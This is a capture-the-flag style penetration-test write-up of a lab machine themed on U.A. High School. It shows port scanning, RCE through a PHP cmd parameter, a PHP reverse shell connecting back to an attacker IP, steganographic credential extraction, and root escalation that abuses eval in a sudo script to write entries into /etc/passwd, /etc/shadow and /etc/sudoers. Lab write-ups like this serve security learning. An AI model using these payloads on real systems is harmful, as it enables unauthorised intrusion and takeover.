U.A. High School
This report details the findings of a penetration test conducted against a target system representing U.A. High School's network infrastructure. The test successfully identified multiple vulnerabilities, leading to full system compromise (root access). The vulnerabilities exploited included:
- Remote Code Execution (RCE) via PHP
index.php
: A vulnerable PHP script allowed arbitrary command execution. - Steganography: Hidden data within an image file revealed user credentials.
- Insecure Script Permissions and
eval
command abuse: A poorly configured script withsudo
privileges allowed for privilege escalation to root.
The penetration test followed a standard methodology:
- Reconnaissance: Gathering information about the target.
- Scanning: Identifying open ports and services.
- Enumeration: Probing services for vulnerabilities and information.
- Exploitation: Gaining initial access using discovered vulnerabilities.
- Privilege Escalation: Elevating privileges to gain higher-level access.
- Post-Exploitation: Maintain access and reach the main objective.
1. Reconnaissance and Scanning
-
Target Identification: The target IP address was identified as
10.10.252.176
. -
Port Scanning (Nmap): A comprehensive port scan using
nmap
revealed the following open ports:export TARGET_IP=10.10.252.176
nmap -p- --min-rate 5000 $TARGET_IPOutput:
Not shown: 65325 closed tcp ports (reset), 208 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
2. Web Application Enumeration
-
Directory Brute-Forcing (Feroxbuster): We used
feroxbuster
to discover hidden directories and files on the web server.feroxbuster -u http://$TARGET_IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -x txt,php,html
- Key Finding: The scan revealed an interesting file:
/assets/index.php
.
- Key Finding: The scan revealed an interesting file:
3. Exploiting Remote Code Execution (RCE)
-
Vulnerability Analysis: Accessing
http://10.10.252.176/assets/index.php?cmd=id
resulted in a Base64 encoded string. Decoding this string revealed the output of theid
command, confirming Remote Code Execution (RCE).echo dWlkPTMzKHd3dy1kYXRhKSBnaWQ9MzMod3d3LWRhdGEpIGdyb3Vwcz0zMyh3d3ctZGF0YSkK | base64 --decode
# Output: uid=33(www-data) gid=33(www-data) groups=33(www-data) -
Exploitation (Reverse Shell): A reverse shell was established using a PHP one-liner (
php -r '$sock=fsockopen("10.2.17.44",6666);exec("sh <&3 >&3 2>&3");'
) generated fromrevshells.com
. This one-liner, when executed on the target, connects back to the attacker's machine.- Attacker Machine (Setup): Start a netcat listener:
nc -lvnp 6666
- Target Machine (Exploit): Send the URL-encoded reverse shell payload:
http://10.10.252.176/assets/index.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.2.17.44%22%2C6666%29%3Bexec%28%22sh%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27
- Result: A shell was obtained as the
www-data
user.
- Attacker Machine (Setup): Start a netcat listener:
4. File Analysis and Steganography
-
File Enumeration: Within the webroot, two image files were found:
yuei.jpg
andoneforall.jpg
. Thefile
command revealed thatoneforall.jpg
was misidentified as data.file ./images/oneforall.jpg # Output: oneforall.jpg: data
file ./images/yuei.jpg # Output: yuei.jpg: JPEG image data, ... -
File Transfer: The suspicious
oneforall.jpg
file was transferred to the attacker's machine for further analysis.Target Machinepython3 -m http.server 8000
Attacker Machinewget http://$TARGET_IP:8000/images/oneforall.jpg
-
Header Correction: The file header was incorrect (identified as PNG data). It was manually corrected to a valid JFIF (JPEG) header using
hexedit
andprintf
. This is a crucial step for steganography tools to work correctly.printf '\xff\xd8\xff\xe0\x00\x10\x4a\x46\x49\x46\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00' | dd of=oneforall.jpg bs=1 count=20 conv=notrunc
file oneforall.jpg #Now it will be recognized.
xdg-open oneforall.jpg # Also be able to see it -
Explanation of the JFIF header: The provided
printf
command constructs a minimal, valid JFIF header. This is essential because steganography tools often check for valid file headers before attempting to extract data.
- You can manually change the header using
hexedit
:FF D8 FF E0 00 10 4A 46 49 46 00 01 01 00 00 01 00 01 00 00
(you can ask an AI chat what each hex means).
-
Steganography Extraction (Steghide):
- A password file was located in the
/var/www/Hidden_Content
directory.
cat /var/www/Hidden_Content/passphrase.txt # QWxsbWlnaHRGb3JFdmVyISEhCg==
echo QWxsbWlnaHRGb3JFdmVyISEhCg== | base64 --decode # AllmightForEver!!!- The base64 decoded string (
AllmightForEver!!!
) was used as a password to extract data.
steghide extract -sf oneforall.jpg
# Enter passphrase: AllmightForEver!!!
cat creds.txt # Output: deku:One?For?All_!!one1/A - A password file was located in the
-
Credential Discovery: The extracted data (
creds.txt
) contained the usernamedeku
and a corresponding password.
5. Privilege Escalation
-
SSH Login: The discovered credentials were used to log in to the target system via SSH.
ssh deku@$TARGET_IP
# Password: One?For?All_!!one1/A -
Sudo Rights Enumeration: The
sudo -l
command was used to check the user's sudo privileges.sudo -l
# Output: (ALL) /opt/NewComponent/feedback.shThis shows that the
deku
user can run/opt/NewComponent/feedback.sh
as root. -
Vulnerable Script Analysis: The
feedback.sh
script was examined. It takes user input and useseval
to echo it, creating a command injection vulnerability. The script attempts to filter some special characters, but the filtering is insufficient.cat /opt/NewComponent/feedback.sh
#!/bin/bash
echo "Enter your feedback:"
read feedback
if [[ "$feedback" != *"\`"* && "$feedback" != *")"* && "$feedback" != *"\$("* && "$feedback" != *"|"* && "$feedback" != *"&"* && "$feedback" != *";"* && "$feedback" != *"?"* && "$feedback" != *"!"* && "$feedback" != *"\\"* ]]; then
echo "It is This:"
eval "echo $feedback"
echo "$feedback" >> /var/log/feedback.txt
echo "Feedback successfully saved."
else
echo "Invalid input. Please provide a valid input."
fi -
Exploitation (Adding a Root User): The
eval
vulnerability was exploited to add a new user (b0end
) to the/etc/passwd
and/etc/shadow
files, effectively creating a root-privileged account. Theopenssl
was used for generate the password hash.First create the user
sudo /opt/NewComponent/feedback.sh
# "b0end:x:7777:7777:b0end:/home/b0end:/bin/bash" >> /etc/passwdSecond, get a hashed password
openssl passwd -crypt Aav3r15tr0ngpaSS # Replace with a strong password. Output example: JBAiFDzIQqipE
Third, add it to shadow file.
sudo /opt/NewComponent/feedback.sh
# "b0end:JBAiFDzIQqipE:0:0:99999:7:::" >> /etc/shadowFourth add the user to sudoers file.
sudo /opt/NewComponent/feedback.sh
# b0end ALL=(ALL) NOPASSWD: ALL >> /etc/sudoers -
Root Shell: The newly created user was used to gain a root shell.
su b0end
# [Enter the password you set]
sudo su
id # Output: uid=0(root) gid=0(root) groups=0(root)